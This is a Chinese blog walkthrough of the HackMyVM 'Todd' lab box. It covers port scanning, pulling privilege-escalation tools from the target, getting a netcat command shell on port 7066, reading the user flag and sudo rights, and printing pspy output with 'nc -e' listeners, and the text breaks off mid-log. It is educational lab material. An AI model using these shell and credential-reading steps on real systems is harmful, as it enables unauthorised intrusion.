{"id":915,"date":"2025-06-27T01:44:12","date_gmt":"2025-06-26T17:44:12","guid":{"rendered":"http:\/\/162.14.82.114\/?p=915"},"modified":"2025-06-27T01:44:12","modified_gmt":"2025-06-26T17:44:12","slug":"hmv-_-todd","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/915\/06\/27\/2025\/","title":{"rendered":"hmv [-_-] Todd"},"content":{"rendered":"<h1>Todd<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142213.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142213.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626214533066\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142215.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626235415785\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Todd yyds\uff01\uff01\uff01\uff01<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\nOpen 192.168.10.106:2278\nOpen 192.168.10.106:3310\nOpen 192.168.10.106:7066\nOpen 192.168.10.106:8604\nOpen 192.168.10.106:9464\nOpen 192.168.10.106:16823\nOpen 192.168.10.106:17685\nOpen 192.168.10.106:18338\nOpen 192.168.10.106:18446\nOpen 192.168.10.106:31000\nOpen 192.168.10.106:32733\n\nPORT      STATE  SERVICE     REASON         VERSION\n22\/tcp    open   ssh         syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D\/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI\/lNPOYSHPRufkm102lE\/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz\/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx\/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1\n|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR\/3p5E5vsqXADwGAoZ2RW5vKPxDV3j\/+QjGbnRDj1iD5\/iwZxxlUggSr5raZfzAHrZA=\n|   256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib\/+q\n80\/tcp    open   http        syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-title: Mindful Listening\n|_http-server-header: Apache\/2.4.59 (Debian)\n2278\/tcp  closed s3db        reset ttl 64\n3310\/tcp  closed dyna-access reset ttl 64\n7066\/tcp  closed unknown     reset ttl 64\n8604\/tcp  closed unknown     reset ttl 64\n9464\/tcp  closed unknown     reset ttl 64\n16823\/tcp closed unknown     reset ttl 64\n17685\/tcp closed unknown     reset ttl 64\n18338\/tcp closed unknown     reset ttl 64\n18446\/tcp closed unknown     reset ttl 64\n31000\/tcp closed unknown     reset ttl 64\n32733\/tcp closed unknown     reset ttl 64\nMAC Address: 08:00:27:C5:A1:A7 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html     \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.106\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 2060]\n\/tools                (Status: 301) [Size: 316] [--&gt; http:\/\/192.168.10.106\/tools\/]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ whatweb http:\/\/$IP\/                                                                                                                                                     \nhttp:\/\/192.168.10.106\/ [200 OK] Apache[2.4.59], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.59 (Debian)], IP[192.168.10.106], Title[Mindful Listening]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626235752595\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142217.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142217.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626235827476\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u3002\u3002\u3002\u3002\u3002\u4e0d\u5bf9\u52b2\uff0c\u5341\u5206\u6709\u5341\u4e00\u5206\u7684\u4e0d\u5bf9\u52b2\u3002\u3002\u3002\u3002<\/p>\n<p>\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ curl -s http:\/\/192.168.10.106\/tools\/ | html2text\n****** Index of \/tools ******\n[[ICO]]       Name             Last modified    Size Description\n===========================================================================\n[[PARENTDIR]] Parent Directory                     -  \n[[   ]]       fscan            2024-02-25 03:32 6.0M  \n[[TXT]]       les.sh           2023-11-25 02:00  89K  \n[[TXT]]       linpeas.sh       2023-04-17 07:54 324K  \n[[   ]]       pspy64           2023-04-17 07:58 3.0M  \n===========================================================================\n     Apache\/2.4.59 (Debian) Server at 192.168.10.106 Port 80\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ wget -q http:\/\/192.168.10.106\/tools\/fscan \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ wget -q http:\/\/192.168.10.106\/tools\/les.sh\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ wget -q http:\/\/192.168.10.106\/tools\/linpeas.sh\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ wget -q http:\/\/192.168.10.106\/tools\/pspy64    \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ ls -la\ntotal 9580\ndrwxrwxr-x  2 kali kali    4096 Jun 26 12:01 .\ndrwxrwxr-x 37 kali kali    4096 Jun 26 11:49 ..\n-rw-rw-r--  1 kali kali 6266348 Feb 25  2024 fscan\n-rw-rw-r--  1 kali kali   90934 Nov 25  2023 les.sh\n-rw-rw-r--  1 kali kali  332111 Apr 17  2023 linpeas.sh\n-rw-rw-r--  1 kali kali 3104768 Apr 17  2023 pspy64<\/code><\/pre>\n<p>\u90fd\u662f\u597d\u4e1c\u897f\u554a\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u4f7f\u7528\u5de5\u5177\u8fdb\u884c\u626b\u63cf\uff0c\u4f46\u662f\u6ca1\u5565\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ .\/fscan -u $IP\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| &#039;__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\n[*] WebTitle http:\/\/192.168.10.106     code:200 len:2060   title:Mindful Listening\n\u5df2\u5b8c\u6210 1\/1\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 757.40907ms<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5bf9\u5404\u4e2a\u7aef\u53e3\u8fdb\u884c\u6d4b\u8bd5\uff0c\u7136\u540e\u795e\u5947\u7684\u4e8b\u60c5\u53d1\u751f\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">PORT      STATE  SERVICE       REASON         VERSION\n22\/tcp    open   ssh           syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D\/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI\/lNPOYSHPRufkm102lE\/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz\/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx\/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1\n|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR\/3p5E5vsqXADwGAoZ2RW5vKPxDV3j\/+QjGbnRDj1iD5\/iwZxxlUggSr5raZfzAHrZA=\n|   256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib\/+q\n80\/tcp    open   http          syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))\n|_http-title: Mindful Listening\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.59 (Debian)\n1530\/tcp  closed rap-service   reset ttl 64\n2894\/tcp  closed abacus-remote reset ttl 64\n3912\/tcp  closed gbmt-stars    reset ttl 64\n7066\/tcp  closed unknown       reset ttl 64\n8455\/tcp  closed unknown       reset ttl 64\n18982\/tcp closed unknown       reset ttl 64\n24924\/tcp closed unknown       reset ttl 64\n26911\/tcp closed unknown       reset ttl 64\n27549\/tcp closed unknown       reset ttl 64\n30901\/tcp closed unknown       reset ttl 64\n31569\/tcp closed unknown       reset ttl 64<\/code><\/pre>\n<p>\u548c\u4e4b\u524d\u90a3\u4e2a\u7aef\u53e3\u622a\u7136\u4e0d\u540c\u3002\u3002\u3002\u3002\u518d\u6b21\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ nmap $IP -p-          \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-26 12:18 EDT\nNmap scan report for 192.168.10.106\nHost is up (0.00050s latency).\nNot shown: 65522 closed tcp ports (reset)\nPORT      STATE SERVICE\n22\/tcp    open  ssh\n80\/tcp    open  http\n5661\/tcp  open  unknown\n7066\/tcp  open  unknown\n7162\/tcp  open  caistoragemgr\n7510\/tcp  open  ovhpas\n10177\/tcp open  unknown\n14011\/tcp open  unknown\n16402\/tcp open  unknown\n27210\/tcp open  unknown\n27927\/tcp open  unknown\n28058\/tcp open  unknown\n28648\/tcp open  unknown\nMAC Address: 08:00:27:C5:A1:A7 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.61 seconds<\/code><\/pre>\n<p>\u5c45\u7136\u5f00\u653e\u4e86\uff1f\uff1f\uff1f\u518d\u6b21\u626b\u63cf\u6bcf\u6b21\u90fd\u4e0d\u4e00\u6837\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\uff0c\u7136\u540e\u7edf\u8ba1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ nmap $IP -p- | grep open | cut -d\/ -f1\n22\n80\n1359\n2954\n6923\n7066\n8099\n9832\n12713\n14070\n20890\n21049\n30046\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ for i in $(seq 1 10); do nmap $IP -p- | grep open | cut -d\/ -f1 &gt;&gt; log; done\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ cat log | sort | uniq -c\n      6 11583\n      6 11693\n      6 12450\n      6 14357\n      4 16638\n      4 17020\n      4 19202\n      6 21804\n     10 22\n      6 23348\n      4 27853\n      6 28777\n      6 31141\n      4 31185\n      4 31292\n      6 31470\n      4 31663\n      3 32135\n      4 3735\n      6 6327\n     10 7066\n     10 80\n      4 9874<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u51fa<code>7066<\/code>\u5927\u6982\u7387\u5c31\u662f\u54b1\u4eec\u8981\u627e\u7684\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ nc $IP 7066                           \nwhoami\ntodd\nid\nuid=1000(todd) gid=1000(todd) groups=1000(todd)<\/code><\/pre>\n<p>\u53d1\u73b0\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\uff01\uff01\uff01\uff01\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142218.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142218.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627002904910\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) todd@todd:\/home\/todd$ ls -la\ntotal 24\ndrwxr-xr-x 2 todd todd 4096 Mar 22 08:03 .\ndrwxr-xr-x 3 root root 4096 Mar 22 06:53 ..\nlrwxrwxrwx 1 root root    9 Mar 22 08:03 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 todd todd  220 Apr 18  2019 .bash_logout\n-rw-r--r-- 1 todd todd 3526 Apr 18  2019 .bashrc\n-rw-r--r-- 1 todd todd  807 Apr 18  2019 .profile\n-rw-r--r-- 1 todd todd   39 Mar 22 06:54 user.txt\n(remote) todd@todd:\/home\/todd$ cat user.txt \nTodd{eb93009a2719640de486c4f68daf62ec}\n(remote) todd@todd:\/home\/todd$ sudo -l\nMatching Defaults entries for todd on todd:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser todd may run the following commands on todd:\n    (ALL : ALL) NOPASSWD: \/bin\/bash \/srv\/guess_and_check.sh\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/rm\n    (ALL : ALL) NOPASSWD: \/usr\/sbin\/reboot\n(remote) todd@todd:\/home\/todd$ ls -la \/srv\/guess_and_check.sh\n-rwx--xr-x 1 root root 1544 Mar 22 11:08 \/srv\/guess_and_check.sh\n(remote) todd@todd:\/home\/todd$ cat \/srv\/guess_and_check.sh\n#!\/bin\/bash\n\ncat &lt;&lt; EOF\n                                   .     **\n                                *           *.\n                                              ,*\n                                                 *,\n                         ,                         ,*\n                      .,                              *,\n                    \/                                    *\n                 ,*                                        *,\n               \/.                                            .*.\n             *                                                  **\n             ,*                                               ,*\n                **                                          *.\n                   **                                    **.\n                     ,*                                **\n                        *,                          ,*\n                           *                      **\n                             *,                .*\n                                *.           **\n                                  **      ,*,\n                                     ** *,     HackMyVM\nEOF\n\n# check this script used by human \na=$((RANDOM%1000))\necho &quot;Please Input [$a]&quot;\n\necho &quot;[+] Check this script used by human.&quot;\necho &quot;[+] Please Input Correct Number:&quot;\nread -p &quot;&gt;&gt;&gt;&quot; input_number\n\n[[ $input_number -ne &quot;$a&quot; ]] &amp;&amp; exit 1\n\nsleep 0.2\ntrue_file=&quot;\/tmp\/$((RANDOM%1000))&quot;\nsleep 1\nfalse_file=&quot;\/tmp\/$((RANDOM%1000))&quot;\n\n[[ -f &quot;$true_file&quot; ]] &amp;&amp; [[ ! -f &quot;$false_file&quot; ]] &amp;&amp; cat \/root\/.cred || exit 2\n\n(remote) todd@todd:\/home\/todd$<\/code><\/pre>\n<p>\u7136\u540e\u7a81\u7136\u5c31\u88ab\u5f39\u51fa\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142219.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506270142219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627003028118\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u53ea\u8981\u4e0d\u6267\u884c\u547d\u4ee4\u5c31\u4f1a\u5f39\u51fa\u6765\uff1f\u5c1d\u8bd5\u5229\u7528\u7ed9\u7684<code>tools<\/code>\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Todd]\n\u2514\u2500$ nc $IP 7066\ncd \/var\/www\/html\/tools\npwd\n\/var\/www\/html\/tools\n.\/pspy64\npspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d\n\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592 \n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591 \n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591  \n                   \u2591           \u2591 \u2591     \n                               \u2591 \u2591     \n\nConfig: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [\/usr \/tmp \/etc \/home \/var \/opt] (recursive) | [] (non-recursive)\nDraining file system events due to startup...\ndone\n2025\/06\/26 12:33:12 CMD: UID=1000  PID=4016   | .\/pspy64 \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3965   | nc -e \/opt\/fake_ssh -lp 27337 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3964   | sudo -u todd nc -e \/opt\/fake_ssh -lp 27337 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3963   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3962   | nc -e \/opt\/fake_ssh -lp 17991 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3961   | sudo -u todd nc -e \/opt\/fake_ssh -lp 17991 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3959   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3958   | nc -e \/opt\/fake_ssh -lp 19926 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3957   | sudo -u todd nc -e \/opt\/fake_ssh -lp 19926 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3955   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3953   | nc -e \/opt\/fake_ssh -lp 29967 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3952   | sudo -u todd nc -e \/opt\/fake_ssh -lp 29967 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3950   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3949   | nc -e \/opt\/fake_ssh -lp 19122 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3948   | sudo -u todd nc -e \/opt\/fake_ssh -lp 19122 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3946   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3945   | nc -e \/opt\/fake_ssh -lp 19152 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3944   | sudo -u todd nc -e \/opt\/fake_ssh -lp 19152 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3942   | \/bin\/bash \/opt\/create_nc.sh \n2025\/06\/26 12:33:12 CMD: UID=1000  PID=3941   | nc -e \/opt\/fake_ssh -lp 1634 \n2025\/06\/26 12:33:12 CMD: UID=0     PID=3940   | sudo -u todd nc -e \/opt\/fake_ssh -lp 1634 \n2025\/06\/26 12:33:12 CMD: UID=0     